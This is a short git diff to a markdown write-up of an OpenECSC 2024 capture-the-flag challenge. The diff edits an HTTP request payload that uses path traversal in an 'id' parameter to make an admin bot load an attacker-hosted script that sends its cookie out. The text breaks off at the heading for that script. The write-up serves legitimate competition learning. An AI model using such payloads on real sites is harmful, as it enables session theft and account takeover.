diff --git a/2024_OpenECSC/round1.md b/2024_OpenECSC/round1.md
index 05aacc1..4fb9cd3 100644
--- a/2024_OpenECSC/round1.md
+++ b/2024_OpenECSC/round1.md
@@ -95,7 +95,7 @@ Then the payload loads a script from the attackers server, which sends the cooki
#### Payload
```http
POST /report?q=/admin HTTP/1.1
-id=3../../../search?q=&message=as/admin
+id=3../../../search?q=&message=as/admin
```
#### Payload Script on Attackers Server
```javascript